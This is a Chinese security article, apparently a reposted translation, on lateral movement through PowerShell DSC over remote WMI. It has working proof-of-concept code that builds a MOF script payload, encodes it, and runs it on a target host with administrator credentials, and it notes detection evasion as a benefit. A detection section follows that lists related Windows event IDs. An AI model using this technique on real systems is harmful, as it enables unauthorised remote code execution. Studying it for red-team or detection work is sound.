技术分享 | 如何通过PowerShell DSC进行横向渗透

栏目: 编程工具 · 发布时间: 6年前

内容简介:PowerShell期望状态配置(DSC)允许需要执行的资源直接使用WMI,在DSC WMI类的帮助下,我们可以通过滥用内置脚本资源来实现PowerShell代码的远程执行。这样的横向渗透技术有如下几点好处:1.PowerShell将在WMI服务-wmiprvse.exe环境下执行,从躲避检测的角度来说这是一个优势。

横向渗透技术简介

PowerShell期望状态配置(DSC)允许需要执行的资源直接使用WMI,在DSC WMI类的帮助下,我们可以通过滥用内置脚本资源来实现PowerShell代码的远程执行。

这样的横向渗透技术有如下几点好处:

1.PowerShell将在WMI服务-wmiprvse.exe环境下执行,从躲避检测的角度来说这是一个优势。

2.Payload的每一个组件都跟WMI有关系。

3.无需配置DSC服务。

横向渗透技术要求

1.ResourceTest方法必须在MSFT_DSCLocalConfigurationManager这个WMI类中,该类需位于root/Microsoft/Windows/DesiredStateConfiguration命名空间中。注意:攻击者还可以选择调用ResourceGet或ResourceSet方法。PowerShell DSC是在PowerShell v4中引入的,所以这项技术并不适用于全部主机。

2.默认情况下,如果你要远程调用WMI方法,你需要拥有管理员凭证。WMI的安全是通过DCOM或WSMan安全设置来实现的,在建立远程连接时,WMI是通过目标命名空间的安全描述符实现的(root/Microsoft/Windows/DesiredStateConfiguration)。

攻击PoC

第一步就是准备Payload如何执行。你需要在目标主机上执行的PowerShell代码需要是MOF格式的,下面给出的是一份Payload样本:

$MOFContents= @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
       ResourceID ="[Script]ScriptExample";
       GetScript = "\"$(Get-Date): Iam being GET\" | Out-FileC:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
      TestScript = "\"$(Get-Date): Iam being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append;return $True";
       SetScript = "\"$(Get-Date): Iam being SET\"   | Out-FileC:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
       SourceInfo = "::3::5::Script";
       ModuleName = "PsDesiredStateConfiguration";
       ModuleVersion = "1.0";
       ConfigurationName ="ScriptTest";
};
instance of OMI_ConfigurationDocument
{
       Version="2.0.0";
       MinimumCompatibleVersion ="1.0.0";
       CompatibleVersionAdditionalProperties={"Omi_BaseResource:ConfigurationName"};
       Author="TestUser";
       GenerationDate="02/26/201807:09:21";
       GenerationHost="TestHost";
       Name="ScriptTest";
};
'@

这里,唯一需要修改的就是PowerShell Payload。在我们的样例中,我们将调用ResourceTest方法,该方法会返回上面的“TestScript”属性。需要注意的是,特殊字符需要转义处理。

下一步就是把MOF转换成二进制形式,这种数据形式也是ResourceTest方法要求的:

#Change this to false if you want to test the payload locally
$ExecuteRemotely= $True
$NormalizedMOFContents= [Text.Encoding]::UTF8.GetString([Text.Encoding]::ASCII.GetBytes($MOFContents))
$NormalizedMOFBytes= [Text.Encoding]::UTF8.GetBytes($NormalizedMOFContents)
$TotalSize= [BitConverter]::GetBytes($NormalizedMOFContents.Length + 4)
if($ExecuteRemotely) {
       # Prepend the length of the payload
       [Byte[]] $MOFBytes = $TotalSize +$NormalizedMOFBytes
}else {
       # If executing locally, you do notprepend the payload length
       [Byte[]] $MOFBytes = $NormalizedMOFBytes
}

在上述样例中,如果你想在本地测试你的Payload,请不要在Byte数组中添加Payload长度。Payload正确编码之后,剩下的就是在目标主机上执行Payload了。

#Specify the credentials of your target
$Credential= Get-Credential -Credential TempUser
$ComputerName= 'TargetHost'
#Establish a remote WMI session with the target system
$RemoteCIMSession= New-CimSession -ComputerName $ComputerName -Credential $Credential
$LCMClass= Get-CimClass -Namespace root/Microsoft/Windows/DesiredStateConfiguration-ClassName MSFT_DSCLocalConfigurationManager -CimSession $RemoteCIMSession
if($LCMClass -and $LCMClass.CimClassMethods['ResourceTest']) {
       # You may now proceed with lateralmovement
       $MethodArgs = @{
           ModuleName          ='PSDesiredStateConfiguration'
           ResourceType   = 'MSFT_ScriptResource'
           resourceProperty= $MOFBytes
       }
       $Arguments = @{
           Namespace  ='root/Microsoft/Windows/DesiredStateConfiguration'
           ClassName  = 'MSFT_DSCLocalConfigurationManager'
           MethodName= 'ResourceTest'
           Arguments  = $MethodArgs
           CimSession= $RemoteCIMSession
       }
       # Invoke the DSC script resource Testmethod
       # Successful execution will be indicatedby "InDesiredState" returning True and ReturnValue returning 0.
       Invoke-CimMethod @Arguments
}else {
       Write-Warning 'The DSC lateral movementmethod is not available on the remote system.'
}

在上面的例子中,大家请注意,我首先验证了远程类和方法的优先级。在使用WMI技术时,我们建议大家首先验证远程类和方法的优先级。

接下来,代码会将Payload下载到目标主机的磁盘中。如果你想要使用WMI来远程获取文件内容,你可以配合使用【 这项技术 】。除此之外,我这里还使用了CIM cmdlet,这个功能是在PowerShell v3中引入的,如果你需要适用v2版本的话,你还可以使用旧版本的WMI cmdlet。

终端检测&保护

幸运的是,我们可以通过检查事件日志来发现这种攻击活动,并进行及时检测。

Microsoft-Windows-PowerShell/Operational事件日志

EventID: 53504

“PowerShell Named Pipe IPC”事件表明PowerShell AppDomain已启用。当DSC执行脚本资源时,这个事件会自动捕捉“DscPsPluginWkr_AppDomain”。而AppDomain对于一次DSC执行来说是唯一的,下面是一个事件样例:

Windows PowerShell has started an IPC listening thread on process: 6480 in AppDomain:DscPsPluginWkr_AppDomain.

“Windows PowerShell”事件日志

EventID: 400

在正常的PowerShell日志中,事件ID 400表明一个新的PowerShell主机进程被创建。当DSC脚本资源执行时,它会生成一个唯一的事件日志条目,并对其进行签名。下面是一个样例(引擎状态从NONE转换成了Available):

Details:
 NewEngineState=Available
 PreviousEngineState=None
 SequenceNumber=13
 HostName=Default Host
 HostVersion=5.1.17134.81
 HostId=19cfc50e-8894-4cd5-b0a9-09edd7785b7d
 HostApplication=C:\Windows\system32\wbem\wmiprvse.exe
 EngineVersion=5.1.17134.81
 RunspaceId=12ebba81-9b73-4b1e-975d-e2c16da30906
 PipelineId=
 CommandName=
 CommandType=
 ScriptName=
 CommandPath=
 CommandLine=

Microsoft-Windows-DSC/Operational事件日志

EventID: 4102

当一个DSC资源被发送至目标主机之后,系统会响应这个事件。如果目标主机存在于一个计算机域中,那么系统会返回执行这个DSC资源的用户SID以及源主机信息。下面是事件样本信息:

Job{893F64B5-ABBF-11E8-B005-D336977413FC} :
OperationInvoke-DscResource started by user sidS-1-5-21-3160353621-618008412-2361186285-1001 from computer NULL.

演示视频

在下面这个视频中,我们将给大家演示本文所介绍的渗透技术:

DEMO代码:【 点我获取

*参考来源: specterops ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

矩阵计算

矩阵计算

Gene H. Golub、Charles F. Van Loan / 袁亚湘 / 人民邮电出版社 / 2009 / 89.00元

本书是国际上数值计算方面的权威著作,有“圣经”之称。被美国加州大学、斯坦福大学、华盛顿大学、芝加哥大学、中国科学院研究生院等很多世界知名学府用作相关课程的教材或主要参考书。 本书系统地介绍了矩阵计算的基本理论和方法。书中的许多算法都有现成的软件包实现,每节后还附有习题,并有注释和大量参考文献,非常有助于自学。一起来看看 《矩阵计算》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

URL 编码/解码
URL 编码/解码

URL 编码/解码

SHA 加密
SHA 加密

SHA 加密工具